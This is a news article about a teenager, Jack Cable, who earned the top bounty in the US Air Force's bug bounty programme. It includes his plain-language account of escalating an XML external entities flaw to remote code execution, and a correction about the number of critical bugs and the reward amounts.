17-year-old Jack Cable topped the USAF bug bounty programme by identifying 30 critical vulnerabilities - Representational image iStock

Hackers are a major threat to the US government and its military. The US Air Force (USAF) got hacked by a 17-year-old high-school student, who instead of getting punished, was paid. However, it wasn't a malicious attack, instead, the teenager participated in the air force's bug bounty programme.

Jack Cable topped the Hack the Air Force programme by identifying 30 vulnerabilities, some of which were critical, and reportedly took home a cash prize, with the Pentagon paying out prizes ranging between $100 (£77) and $5,000 for each vulnerability. Cable told IBTimes UK that the programme shelled out a total of $130,000.

Unlike other bug bounty programmes, the USAF made its hackathon open to hackers from across the globe. The Air Force said that 33 hackers who participated in the bug bounty programme "came from outside the US," while two were active duty US military personnel. The air force also confirmed that Cable earned "the largest bounty".

"I found what's known as an XML external entities vulnerability. That handles the applications processing of XML, which is a type of input data. I found that I could give it a URL and the application would make a request to that website. And I was able to escalate that after working on for a few hours into a remote code execution. So that would allow me to basically do whatever I wanted. So I could access all the user data that was on the website and I could change anything that I wanted to," Cable told Marketplace.

The USAF bug bounty was reportedly run by the HackerOne platform and invited around 600 hackers from the US, Canada, UK, Australia and New Zealand. All the five nations are part of the Five Eyes intelligence alliance.

Cable also reported vulnerabilities in India-based food app Zomato. In May, 17 million Zomato user accounts were put up for sale on the dark web. However, shortly after the breach, the food and restaurant searching app launched its own bug bounty programme.

Such programmes have gained popularity over the past few years, with platforms such as Tor, recently launching its own. In the past, tech giants such as Google, Twitter, Facebook, Apple and others have paid out white-hat hackers substantial cash rewards for finding bugs and helping improve their cybersecurity infrastructure.


This article has been updated to include Jack Cable's comments. A previous version of the story incorrectly stated that the hackers who topped the bug bounty programme including Cable received hundreds of thousands as reward.

After publication of the article, Cable reached out to IBTimes UK confirming that none of the hackers who participated in the programme made over $130,000. Cable also confirmed that he identified 30 vulnerabilities, although not all of them were critical.